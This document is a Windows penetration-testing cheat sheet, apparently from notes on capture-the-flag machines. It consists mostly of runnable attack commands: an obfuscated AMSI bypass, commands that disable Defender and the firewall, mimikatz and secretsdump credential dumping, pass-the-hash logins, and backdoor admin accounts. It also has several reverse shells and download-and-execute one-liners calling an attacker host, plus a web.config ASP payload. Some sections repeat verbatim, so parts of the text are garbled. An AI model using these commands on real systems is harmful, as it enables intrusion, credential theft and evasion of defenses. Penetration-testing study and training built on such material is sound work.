7. Newb Guide - Windows Pentest
8. Kerberos Attacks Explained
9. How to Attack Kerberos 101
Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info
check for Non-windows processes in windows using netstat
{Metasploit} Login with NTML Pass hases into a Windows machine
Run as admin with prev saved cred
Transfer Files & Getting Root Shell
8. Kerberos Attacks Explained
9. How to Attack Kerberos 101
Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info
check for Non-windows processes in windows using netstat
Step 1: Check net user and admin and user rights
Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1.
Step 3: Try to get Meterpreter.
Step 4: Load mimikatz,try bypass UAC, check SAM SYSTEM etc.
Step 5: check for weird programs and registry.
Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce Atacking AD with LDAP & kerberos
Step 7: Got Creds - try psexec.py or crackmapexec - cheatsheet
Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce Atacking AD with LDAP & kerberos
Step 7: Got Creds - try psexec.py or crackmapexec - cheatsheet
SMB Enumeration smbmap -H 10.10.10.10 //Check Privileges smbmap -H 10.10.10.10 -R --depth 5 smbclient -L //10.10.10.10/ //List Shares smbclient //10.10.10.10/Users //Interactive shell to a share smbclient \\\\10.10.10.10\\share$ //Open a Null Session smbclient //friendzone.htb/general -U "" //see files inside smbclient -N -L //10.10.10.10/ //List Shares as Null User psexec.py administrator@10.10.10.10 //Enter pass later smbmap -u Administrator -p 'Password@1' -H 10.10.10.10 smbclient -U 'administrator%Password@1' \\\\\10.10.10.10\\c$ once logged in; put filename //can upload any file
#Using Kerberos ticket with Smbclient
smbclient -k -L //10.10.10.10/
#Basic SMB & OS info crackmapexec smb 10.10.10.10 #List Shares crackmapexec smb 10.10.10.10 --shares #passing blank creds via smb crackmapexec smb 10.10.10.10 --shares -u '' -p ''
#If the password needs to be changed
smbpasswd -U username -r 10.10.10.10
#Brute forcing SMB Creds
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt
#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15 smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success
#access SMB using a hash
smbclient //10.10.10.10/NAME -U username --pw-nt-hash 07772ae654432cd618915793515asds
#Starting SMB Server
sudo smbserver.py share $(pwd)
Find Users in Windows Environment nmap --script smb-enum-users.nse -p445 IP_Address
Powershell Ping Sweep
1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_} | Select-String ttl
DNS Enum
dig @10.10.10.10 -x 10.10.10.10
Ldap Enumeration: ldapsearch -x -h 10.10.10.10 -s base namingcontexts ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt Dumping passwords using LDAP: ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd
Domain Enumeration with RPcclient #Enum using Null Session rpcclient -U "" 10.10.10.10
#Login as a user
rpcclient -U USERNAME //10.10.10.10 #Find Users in the domain rpcclient -Uuser_Name%PASSWORD -c enumdomusers 10.10.10.10 #Find Domian Info rpcclient -Uuser_Name%PASSWORD -c querydominfo 10.10.10.10 #Find Groups and their Alias rpcclient -Uuser_Name%PASSWORD -c "enumalsgroups builtin" 10.10.10.10 #Find more info using Alias and note SIDs rpcclient -Uuser_Name%PASSWORD -c "queryaliasmem builtin 0x244" 10.10.10.10 #Find more info using SIDs rpcclient $> lookupsids S-1-5-21-586154515854-343543654-8743952433-1105
#Reset other Users Password
rpcclient -U user1 //10.10.10.10setuserinfo2 USER2 23 'PASSWORD'
Enum using RPCClient
rpcclient -U DOMAIN\\Username 10.10.10.10 #Enter pass
enumdomusers #Enumerate Domain Users
enumprivs #Enum Privileges
enumprinters #Enum Printers
Access other user's share
net use \\DC.STEINS.LOCAL\c$ /u:STEINS.LOCAL\admin 'P@$$W0rd!'
or
$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)
invoke-command -computername dc -scriptblock { dir C:\users\username\desktop } -credential $cred
Add a user to another group
Powerview:
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
Windows:net group "Remote Admin Permissions" USERNAME /add /domain
Disable AntiVirus/ Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
Diasble AMSI
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Download All the files Recursively from a Share:smbclient '\\IP_ADDRESS\Share' -N -c 'prompt OFF;recurse ON;mget *' or
smbclient '\\server\share' mask "" recurse ON prompt OFF cd 'path\to\remote\dir' //Can Skip lcd '~/path/to/download/to/' //Can Skip mget *
Mounting SMB Share:
smbclient -L //IP_Address /suppose if you have access to one share. we can mount it to check the data
mkdir /mnt/smb
moung -t cifs //IP_ADDRESS/Share_Name /mnt/smb
cd /mnt/smb /We can gain access to it.
Writable Directories
save exploits in below directories.
C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\Tasks
C:\windows\tracing
Run as NT Authority/System when you are running as Administrator
Psexec.exe -s -d -i cmd.exe
Running a Powershell Script on Target Machine
http://website.com/cmd.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33/pu.ps1')| powershell -noprofile -
RCE using wmiexec
proxychains wmiexec.py -debug -nooutput domain/username:'password'@TARGET_ip "powershell.exe Invoke-WebRequest -Uri 'http://KALI_ip/nc.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\nc.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe KALI_IP 9001"
Getting Hashes from SAM/System reg save HKLM\SAM C:\sam reg save HKLM\SYSTEM C:\system impacket-secretsdump -sam SAM -system SYSTEM local Note: if the hash starts with 31d6, the password is either blank or the account is disabled. decrypt the hash from http://hashes.org/search.php Login with the HASH: smbmap -u USER_NAME -p WHAT_EVER:THE_HASH_IS -H IP_ADDRESS
If MountD service is running
showmount -e 10.10.10.10 #lists the available mount drives
mkdir /tmp/SHARE_NAME
mount -t nfs 10.10.10.10:/SHARE_NAME /tmp/SHARE_NAME -nolock
Logging into Mysql and Getting a shell
mssqlclient.py -windows-auth -p 1433 10.10.10.125/Reporting:PcwTWTHRwryjc\$c6@10.10.10.125
or
mssqlclient.py mssql-svc@10.10.10.125 -windows-auth
corporate568 //Password
Ping Sweep
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i
Run CMD Commands in Powershell
cmd /c 'COMMAND'
Find OS Version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Check for Privileges whoami /priv
whoami /all
Check for Running Serices - CMD
sc queryex type= service state= all
List Service Names only
sc queryex type=service state=all | find /i "SERVICE_NAME:"
Search for a Specific Service
sc queryex type=service state=all | find /i "SERVICE_NAME: myService"
Get Status of Service
sc query myService
Get List of Running Srevices
sc queryex type=service
sc queryex type=service state=active
net start
# Services running on localhost netstat -ano
Check for Accessible Shares
net share
Check for Running Serices - PS
Get-Service
Get List of Running Srevices
Get-Service | Where-Object {$_.Status -eq "Running"}
Get Status of a Service
Get-Service myService
See the Services Running as NT Authority
wmic service where started=true get name, startname
AlwaysInstall Elevated: Allows non-privileged users to run executables as SYSTEM reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated If Available: msfvenom -p windows/adduser USER=bhanu PASS=bhanu123 -f msi -o create_user.msi On target:
msiexec /quiet /qn /i C:\create_user.msi Metasploit: use exploit/windows/local/always_install_elevated
Scheduled Tasks:
schtasks /query /fo LIST /v /Too much info
Running Windows Services
net start
Services Running on Localhost netstat -ano netstat -an | find "LISTEN" Using Plink: on Kali: sudo service ssh start on Victim: plink.exe -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward Example: plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389 Portforward using Meterpreter: portfwd add -l <attacker port> -p <victim port> -r <victim ip> portfwd add -l 3306 -p 3306 -r 192.168.1.101 Remote Port Forwarding using Chisel-download on kali: chisel server --port 9002 -reverse on target: chisel.exe client KALI_IP:9002 R:127.0.0.1:8888:KALI_IP:9003 Port Forwarding using NetSH: Need admin to run netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=8888 connectaddress=10.10.14.7 connectport=8000 #listen Address = VICTIM IP #Listen Port = Victim Port #connectaddress = Attacker IP #connectport = Attacker Port
Compiling 32-bit Exploits:
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
Creating cmd.exe
nano cmd.c
#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}
sudo x86_64-w64-mingw32-gcc cmd.c -o cmd.exe
World Readable
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Autologon Registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
View Hidden Directories
dir -Force
Poweshell Commands:
Get-ChildItem . -Force
gci -Force
ls -Force
Find Passwords in Registry # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly" vncpwd.exe PASSWORD_FROM_ABOVE # SNMP Parameters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
#Winscp
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP" 2\Sessions
To decrypt winscp keys,copy the username,hostname and encrypted password and use github-winscppassworddecrypt
# Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
Using Other Users Registry in Regedit
net user /add bhanu Bhanu@1234 /Create an account named Bhanu
net localgroup administrators bhanu /add Give Admin Privs reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 Start RDP Service
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
proxychains rdesktop 10.10.10.10 -u Bhanu -p Bhanu@1234
#loading Other Users HKU
load HKU\USERNAME c:\users\USERNAME\ntuser.dat
now open regedit and find the username in HKEY_USERS
IIS Webserver - Hidden Files and Config Files
dir /a C:\inetpub\ dir /s web.config C:\Windows\System32\inetsrv\config\applicationHost.config
Anything in Credential Manger
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Check for Vulnerable Drivers
DRIVERQUERY
Find Installed Paths
wmic qfe get Caption,Description,HotFixID,InstalledOn
Using Runas to run as Different User PsExec.exe -u hostname\username -p password "nc.exe TARGET_IP 443 -e cmd.exe" C:\Windows\System32\runas.exe /env /noprofile /user:USERNAME PASSWORD "c:\users\Public\nc.exe -nc TARGET_IP 443 -e cmd.exe" Using Powershell: $secpasswd = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force $mycreds = New-Object System.Management.Automation.PSCredential ("USERNAME", $secpasswd) $computer = "HOSTNAME" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) TO run the Script: powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1
or
use RunasCS Github
Can We Access SAM & System Files
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Checking File Permissions using assesschk.exe
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
accesschk.exe -uwcqv "username" * / Check for RW permissions
Exploit:
sc config daclsvc binpath= "net localgroup administrators bhanu /add "
sc start daclsvc
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?
tasklist /svc
tasklist /v
net start
sc query
Always Install Elevated Privileges
This the DWORD of these registries contain "AlwaysInstallElevated" which is set to "1", we can install any msi as NT Authrity\System
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
OR
reg qurey "HKLM\Software\Policies\Microsoft\Windows\Installer"
reg qurey "HKCU\Software\Policies\Microsoft\Windows\Installer"
Exploit:
msfvenom -p windows/exec CMD='net localgroup administrators bhanu /add' -f msi-nouac -o exploit.msi
on Target: msiexec /quiet /qn /i C:\temp\exploit.msi
Scheduled Tasksschtasks /query /fo LIST 2>nul | findstr TaskName dir C:\windows\tasks Powershell:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Unquoted Service Paths -
can be exploited - use PowerUPwmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ OR
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """ OR
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul Powershell:
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Juicy Potato Exploit - SeImpersonatePrivilege Enabled
JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=443 -f exe -o reverse.exe
./jp.exe -l 1345 -p c:\windows\temp\reverse.exe -t *
Operating System information is found in
C:\Windows\System32\license.rtf --> windows 7
C:\Windows\System32\eula.txt --> windows xp
Decrypt GPP Policy from Groups.xml Groups.xml: get-content "C:\programdata\Microsoft\group policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml" <?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"> <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1"> <Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups> gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ
Check for Installed Patches wmic qfe get Caption,Description,HotFixID,InstalledOn
Using Sherlock To Check Vulns certutil -f -split -urlcache http://10.10.10.10/sherlock.ps1 poweshell -nop -ep bypass Import-Module .\sherlock.ps1 Find-AllVulns
Check these Config Files - Might contain Password type c:\windows\Panther\Untattended.xml \\Find Base64 password type "c:\ProgamData\McAfee\Common Framework\SiteList.xml" \\Find Base64 password c:\sysprep.inf c:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml
Priv Esc using a Service running as root: ------------------------------------------ services.msc select a service, which u think might be vulnerable and go to the file's location in cmd icacls scsiaccess.exe /if Everyone is present, we can exploit it by replacing the original file by our file in Kali: Lets create an exploit code for it :) ---------- nano useradd.c #include<stdlib.h> int main() { int i; i=system("net localgroup administrators username /add"); return 0; } ctrl +x --> y i586-mingw32msv-gcc useradd.c -o useradd.exe copy this useradd.exe to the target machine and name it as scsiaccess.exe restart the machine/service :) services.msc scsiaccess.exe --> right click --> restart
Powershell Sudo For Windows
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
powershell -ExecutionPolicy Bypass -File xyz.ps1
Disable Firewall/Defender and Enable RDP for all Users
sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Downloading Files with bitsadmin
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
PsExec Shell for Remote Systems
.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe
Search for keyword "pass,cred,vnc and config"
dir /s *pass* == *cred* == *vnc* == *.config*
search files with keyword "Password" in .xml,ini,.txt files findstr /si password *.xml *.ini *.txt
Grep Registry for "Password" Keyword reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
Finding Services with incorrect permissions:for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" If wmic is not availale - try sc
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Windows XP Priv Esc - Incorrect Permission in Services
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.48 9002 -e C:\WINDOWS\System32\cmd.exe"
OR - run all the below commands together to create an Administrator account
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
sc config upnphost binpath= "net user bhanu bhanu123 /add"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "net localgroup administrators hacker /add "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "reg add 'hklm\system\currentcontrolset\control\terminal server' /f /v fDenyTSConnections /t REG_DWORD /d 0 "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "netsh firewall set service remoteadmin enable "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
sc config upnphost binpath= "netsh firewall set service remotedesktop enable"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
in Kali:
rdesktop IP_Address
IIS HTTP 6.0 Exploit
No Proper Input Validation, So change your exploit to
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f asp -o payload.html
move payload.html payload.asp;.html
Priv Esc From NT Authrity Service to NT Authority System
Windows Server 2003 -- NT Authority Service to System
Download and copy the exploit to target machine
https://www.exploit-db.com/exploits/6705
Github
Exploiting IIS 6 with ASP .NET
copy churrasco.exe c:\windows\temp\
churrasco.exe -d "net users /add bhanu bhanu123"
churrasco.exe -d "net localgroup administrators bhanu /add"
churrasco.exe -d “reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0”
churrasco.exe -d "netsh firewall set service remoteadmin enable"
churrasco.exe -d “netsh firewall set service remotedesktop enable”
Might be Helpful - Rotten Potato
Session Hijacking - Privilege Impersonation
- when another user has a session on the same machine - need to run as admin #View the logged in sessions - users ; make sure the State is Disc (not-active) query user #create a service that runs as the other user ; /ID= the ID value from query user command; /dest= SESSION NAME from query user # You should see "[SC] CreateSession SUCCESS" sc create ServiceName binpath= "cmd.exe /k tscon 3 /dest:Atacker_SessionName" #Start the service; ServiceName = the one that we created earlier net start ServiceName #you should be running as the user now.Exploiting IIS httpd 7.5 You need to add the following code at the end of web.config file and upload it into the server and get a reverse shell using it. reverse shell should be in winrevshell.ps1 file; a file sharing server should be turned on as well. <% Set s = CreateObject("WScript.Shell") Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')") o = cmd.StdOut.Readall() Response.write(o) %> Sample Web.config file with Exploit <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <% Set s = CreateObject("WScript.Shell") Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')") o = cmd.StdOut.Readall() Response.write(o) %>
Mysql Running as Root Download the UDF file from Here Tutorial is here use mysql; create table potato(line blob); insert into potato values(load_file('/tmp/lib_mysqludf_sys.so')); select * from potato into dumpfile '/usr/lib/lib_mysqludf_sys.so'; create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; select sys_exec('bash -i >& /dev/tcp/IP_ADDRESS/443 0>&1'); OR try the automated script Github Exploit Video Tutorial
Meterpreter ASP Reverse Shell or Windows
msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.11.0.48 LPORT=9001 -f asp > shell.asp
Dumping Credentials using mimikatz mimikatz.exe privilege::debug /You should see 200 OK sekurlsa::logonpasswords /dump creds and other info
sekurlsa::tickets /view available tickets
sekurlsa::tickets /export /Download all the tickets
Exploiting SeBackupPrivilege Enabled
#robocopy can be used to copy some files
robocopy C:/Users/Administrator/Desktop/ C:\Temp\ /B
nano darkshadow.txt
set metadata C:\temp\data\metadata.cab
set context persistent nowriters
add volume c: alias tester
create
expose %tester% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\data\ntds.dit
delete shadows volume %tester%
reset
or
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup
diskshadow /s darkshadow.txt
Output:
Number of shadow copies listed: 1
-> expose %tester% z:
-> %tester% = {58f8797b-eca2-4d6b-b6f6-351e503b24cb}
The shadow copy was successfully exposed as z:\.
robocopy F:/windows/ntds/ C:\Temp\ /B
OR
Need to download 2 dll files - SeBackupPrivilegeCmdLets.dll & SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\data\ntds.dit
reg save hklm\system C:\temp\data\system.bak
download both the files to the attacker macahine and get the hashes using secretsdump
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
#login as Admin using the hash
evil-winrm -H 9658dsa3t1d9250115e2205d9f48400d -u administrator -i 10.10.10.10
#For Clear Text Password
lsassy -d steins.local -u Administrator -H 9658dsa3t1d9250115e2205d9f48400d 10.10.10.10 -m 0 --procdump procdump.exe --dumpert dumpert.exe
Current User:
whoami /all
List out all Users: net user
Add a user: net user bhanu bhanu123 /add
Adding a user to Administrators Group: net localgroup administrators bhanu /add
Remove a user: net user hacker /del
Check for Active Users using Powershell:
powershell -Command (get-wmiobject win32_useraccount
View Hidden Directories:
dir -Force
dir /R
Get a Proper Windows Shell:
apt-get install rlwrap
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
rlwrap nc -nvlp 9001
Hot Potato - Importing a Powershell Exploit and execute it
powershell -ep bypass -nop
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net users \add bhanu"Invoke-Tater -Trigger 1 -Command "net localgroup administrators bhanu /add"
Download and Execute a Reverse Shell
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
python -m SimpleHTTPServer 8001
nc -nvlp 9001
#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Change ACL for a File
Get a Proper Windows Shell:
apt-get install rlwrap
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
rlwrap nc -nvlp 9001
Hot Potato - Importing a Powershell Exploit and execute it
powershell -ep bypass -nop
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net users \add bhanu"Invoke-Tater -Trigger 1 -Command "net localgroup administrators bhanu /add"
Get a Proper Windows Shell:
apt-get install rlwrap
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
rlwrap nc -nvlp 9001
Hot Potato - Importing a Powershell Exploit and execute it
powershell -ep bypass -nop
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net users \add bhanu"Invoke-Tater -Trigger 1 -Command "net localgroup administrators bhanu /add"
Download and Execute a Reverse Shell
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
python -m SimpleHTTPServer 8001
nc -nvlp 9001
#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Download and Execute a Reverse Shell Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\") python -m SimpleHTTPServer 8001 nc -nvlp 9001 #Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Change ACL for a File
cacls “C:\Users\Administrator\Desktop\root.txt” /E /P Alfred:F
cacls Windows utility to view/edit file permissions
/E to edit ACL
/P to set permissions
Alfred:F to give Alfred full control of the file
cacls “C:\Users\Administrator\Desktop\root.txt” /E /P Alfred:F
cacls Windows utility to view/edit file permissions
/E to edit ACL
/P to set permissions
Alfred:F to give Alfred full control of the file
Add this to Cron Jobs To get a Shell
echo "IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/rev9002.ps1')" > cronjob_FileName.ps1
Login with NTML Pass hases into a Windows machine
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
Create RDP Access on Target Machine - After you got the shell
net user /add bhanu bhanu123 /Create an account named Bhanu net localgroup administrators bhanu /add Give Admin Privsreg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 Start RDP Service netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable
On kali: rdesktop 10.10.10.63
{Metasploit} Login with NTML Pass hases into a Windows machine
use exploit/windows/smb/psexec set rhost 10.10.10.63 set smbuser administrator set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 set lport 8888 exploit
run getgui -e /Enable RDP on Target shell net user administrator password on Kali: rdesktop 10.10.10.63 administrator password
Check for Hidden Files:
get-content .\root.txt -stream *
get-content .\root.txt -stream root.txt
Run as admin with prev saved cred
runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt"
File Transfer using Certutil.exe
certutil.exe -urlcache -split -f http://10.10.14.6/sherlock.ps1 sherlock.ps1
Priv Esc (getting Root) using Metasploit
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.6 LPORT=9003 –platform win -a x64 -f exe > shell.exe
certutil -urlcache -f http://10.10.14.6:8001/shell.exe shell.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lport 9003
set lhost 10.10.14.6
run
run post/multi/recon/local_exploit_suggester
